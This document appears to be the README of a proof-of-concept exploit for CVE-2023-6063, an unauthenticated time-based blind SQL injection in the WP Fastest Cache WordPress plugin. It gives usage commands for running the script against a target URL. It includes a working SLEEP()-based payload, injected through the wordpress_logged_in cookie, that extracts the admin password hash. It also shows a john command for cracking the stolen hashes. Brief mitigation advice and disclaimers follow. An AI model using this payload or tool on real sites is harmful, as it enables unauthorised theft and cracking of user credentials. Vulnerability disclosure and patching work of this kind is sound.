A Proof on Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2.# PoC for CVE-2023-6063: WP Fastest Cache 1.2.2 Unauthenticated Blind SQL Injection
-red)
A Proof on Concept for CVE-2023-6063, a time-based blind SQL injection vulnerability in WP Fastest Cache ≤1.2.2. Extracts hashed passwords (`user_pass`) and emails (`user_email`) from the `wp_users` table by abusing the `wordpress_logged_in` cookie.
## Features
- Time-based data exfiltration (char-by-char) via SLEEP() delays.
- Supports custom cookies, target usernames, and hash validation.
This script extracts:
- ☑️ WordPress password hashes (MD5/PHPass).
- ☑️ Associated email addresses.
- CLI arguments for flexible testing (--just-hash, --just-email, --debug).
### Usage
Install the dependencies (if aren't installed):
~~~ bash
pip install -r requirements.txt
~~~
Basic usage:
~~~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
~~~
Full options:
~~~
-h, --help show this help message and exit
-u URL, --url URL Full URL to Wordpress for testing CVE-2023-6063
--username USERNAME Define a user to extract its hashed pass
-d DELAY, --delay DELAY
Time for wait web response default 5, minimum 2
-H HASH, --hash HASH Hash to verify against wp_users table, if the hash contains specials characters, please use single quotes -> '<hash>'
--domain DOMAIN Name of the domain for email validation
-c COOKIE, --cookie COOKIE
Specify a cookie name if it's different on your context
--status-code STATUS_CODE
Use a specific positive status code, default 200
--debug More verbosity
--just-hash Just extract hashed password
--just-email Just extract email value for a user
~~~
## 💻 Demo
This is a demo for the admin user
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
When hashes passwords are leaked, use `john` or `hashcat` for decrypt it with `PHPass` algorithm if the password is vulnerable.
John example:
~~~ bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
~~~
# 🕵️♂️ Technical Details
## 📖 Vulnerability Decription
The WP Fastest Cache plugin (≤1.2.2) for WordPress is vulnerable to an unauthenticated blind SQL injection via the wordpress_logged_in cookie. Attackers can exploit this flaw to extract sensitive data (e.g., password hashes, email addresses) from the wp_users table by leveraging time-based delays (SLEEP()) in SQL queries.
~~~ sql
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
~~~
🚨 Disclaimer: Use this information only for ethical security testing with proper authorization. Unauthorized exploitation is illegal.
- CVE ID: CVE-2023-6063
- Vulnerability Score: 7.5 (High)
- Vulnerability Type: SQL Injection (Blind, Time-Based)
- Affected Software: WP Fastest Cache (WordPress Plugin) ≤ v1.2.2
## 🔍 Attack Vector
- Exploitability: Remote (No authentication required)
- Attack Complexity: Low (Exploitable via crafted HTTP requests)
## 🔥 Impact:
- Confidentiality: High (Leaks admin credentials)
- Integrity: None
- Availability: None
## 📌 Affected Versions
- WP Fastest Cache versions ≤1.2.2
## 🛡️ Mitigation
Upgrade WP Fastest Cache to version >1.2.2.
- Upgrade to WP Fastest Cache v1.2.3 or later.
- Apply WAF rules to block SQLi payloads in cookies.
- **Disable plugin if unused.**
## 📚 References
- [NIST NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-6063)
- [WordPress Plugin Advisory](https://wordpress.org/plugins/wp-fastest-cache/)
- [CVE Details](https://www.cvedetails.com/cve/CVE-2023-6063/)
## ⚖️ Legal
- This script is for educational purposes. Always obtain explicit permission before testing.
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view